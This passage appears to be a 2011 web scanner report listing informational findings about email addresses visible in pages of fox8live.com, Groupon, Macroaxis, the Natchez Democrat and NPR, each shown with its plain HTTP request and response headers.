<a href="/mediacenter/local.aspx?videoid=23636@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23616@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23551@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23527@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23507@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23506@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23419@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23397@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23303@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23143@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23110@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24358@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24339@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24271@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.8. http://www.fox8live.com/content/news/seregni/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/seregni/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /content/news/seregni/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:08 GMT
Age: 36
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 43733
Connection: keep-alive
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24684@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24555@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24448@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24345@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24040@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23722@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23605@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23493@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23383@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23170@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=23080@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=22994@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=22648@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=22450@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=22027@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=21931@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=21347@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=20307@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=20210@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=19471@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=18710@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=18495@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=17745@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=17173@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=16999@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=16363@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=15744@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=14707@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=13689@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=13345@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=13282@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=12969@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=12346@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=11971@wvue.web.entriq.net&amp;navCatId=562">
...[SNIP]...
<a href="mailto:TechGuru8@gmail.com">
...[SNIP]...

20.9. http://www.fox8live.com/content/news/watercooler/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/watercooler/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /content/news/watercooler/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/seregni/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:27 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:27 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27624
Connection: keep-alive
Content-Length: 27624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.10. http://www.fox8live.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: rf-ms iad-agg-n30 ( iad-agg-n22), ht iad-agg-n22.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:40:50 GMT
Age: 44
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 102042
Connection: keep-alive
Content-Length: 102042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24757@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24743@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24752@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24703@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24704@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24677@wvue.web.entriq.net&amp;navCatId=771">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24657@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24542@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24532@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24759@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24757@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24756@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24755@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24754@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24750@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24746@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24752@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24747@wvue.web.entriq.net&navCatId=3">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24687@wvue.web.entriq.net&navCatId=792">
...[SNIP]...
<a class="ChangeVideoLink" href="http://www.fox8live.com/mediacenter/local.aspx?videoId=24557@wvue.web.entriq.net&navCatId=792">
...[SNIP]...

20.11. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57286
Connection: keep-alive
Content-Length: 57286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoId=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.12. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Issue detail

The following email address was disclosed in the response:

Request

GET /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HitCount_f50e95bc-67af-48eb-8d01-767a4029b6a1_0=1; uts=12; __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:42 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n20), ms iad-agg-n20 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 60505
Connection: keep-alive
Content-Length: 60505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoId=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.13. http://www.fox8live.com/wireless/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /wireless/default.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /wireless/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:59 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 20605
Connection: keep-alive
Content-Length: 20605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24754@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24756@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...
<a href="/mediacenter/local.aspx?videoid=24755@wvue.web.entriq.net&amp;navCatId=3">
...[SNIP]...

20.14. http://www.groupon.com/privacy

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /privacy

Issue detail

The following email address was disclosed in the response:

Request

GET /privacy HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:35:45 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:44 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:45 GMT; HttpOnly
Status: 200
ETag: "674d83fb859dfa126fff53b15ed631d0"
X-Runtime: 734
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
<p>Your friend may contact us at support@groupon.com to request that we remove this information from our database.</p>
...[SNIP]...
able Information you provide us. You may change any of your Personally Identifiable Information by logging into your account and accessing the "my account" section of the site, sending us an email at support@groupon.com or writing to us at 600 West Chicago Avenue, Suite 620, Chicago, Illinois 60654. Please indicate your name, address and email address, and what information you would like to update when you contact us
...[SNIP]...
of our Advertisers and Affiliates. If you do not want to receive Promotional Emails from us, you may elect to opt-out of receiving Promotional Emails at any time after registering by e-mailing us at support@groupon.com, by writing to us at the address contained herein, or by hitting the ...unsubscribe... button at the bottom of any of our e-mails. When contacting us, please indicate your name, address, email addres
...[SNIP]...
<a href="mailto:support@groupon.com">support@groupon.com</a>
...[SNIP]...

20.15. https://www.groupon.com/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The following email address was disclosed in the response:

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
<input class="prompting_field focused grid_5 input" id="session_email_address" name="session[email_address]" size="30" title="you@domain.com" type="text" />
...[SNIP]...

20.16. http://www.macroaxis.com/widgets/url.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /widgets/url.jsp?t=26&s=NYA,IXIC,GSPC HTTP/1.1
Host: www.macroaxis.com
Proxy-Connection: keep-alive
Referer: http://www.hnedata.net/features/tr_stock_charts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Set-Cookie: JSESSIONID=189FB444592D30A261C6DE609DF507AC; Path=/
Content-Length: 2449
Content-Type: text/html;charset=ISO-8859-1


function iecheck() {
if (navigator.platform == "Win32" && navigator.appName == "Microsoft Internet Explorer" && window.attachEvent) {
var rslt = navigator.appVersion.match(/MSIE (\d+\.\d
...[SNIP]...
<b>Configuration Error: Contact us support@macroaxis.com to resolve this issue</b>
...[SNIP]...

20.17. http://www.natchezdemocrat.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.natchezdemocrat.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.natchezdemocrat.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=124195861.1304954844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=124195861.1072315151.1304954844.1304954844.1304954844.1; __utmc=124195861; __utmb=124195861.1.10.1304954844

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:17 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Last-Modified: Mon, 09 May 2011 15:36:27 GMT
Vary: Accept-Encoding,Cookie
Expires: Mon, 09 May 2011 16:36:27 GMT
Pragma: public
Cache-Control: public, must-revalidate, proxy-revalidate
Etag: 9f7d4ebf4b1f290977c44ce93671a199
X-Pingback: http://www.natchezdemocrat.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 57842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><meta
...[SNIP]...
<a href="mailto:newsroom@natchezdemocrat.com">
...[SNIP]...

20.18. http://www.npr.org/templates/javascript/generated/regPage.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.npr.org
Path:   /templates/javascript/generated/regPage.js

Issue detail

The following email address was disclosed in the response:

Request

GET /templates/javascript/generated/regPage.js HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:56:57 GMT
Server: Apache/2.2.14 (Unix)
Accept-Ranges: bytes
